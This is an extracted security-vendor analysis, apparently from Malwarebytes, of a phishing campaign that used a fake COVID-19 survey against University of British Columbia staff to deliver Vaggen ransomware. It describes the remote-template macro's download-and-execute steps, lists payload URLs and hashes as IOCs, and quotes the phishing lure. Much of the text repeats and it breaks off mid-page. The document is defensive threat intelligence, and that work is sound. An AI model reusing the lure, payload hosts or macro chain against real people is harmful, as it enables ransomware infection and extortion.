3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 489 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 490 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 491 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 492 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 493 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 494 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 495 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 496 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 497 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 498 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 499 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 500 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 501 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 502 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 503 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 504 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 505 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 506 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 507 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 508 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 509 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 510 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 511 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 512 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 513 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 514 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 515 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 516 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 517 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 518 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 519 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 520 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 521 of 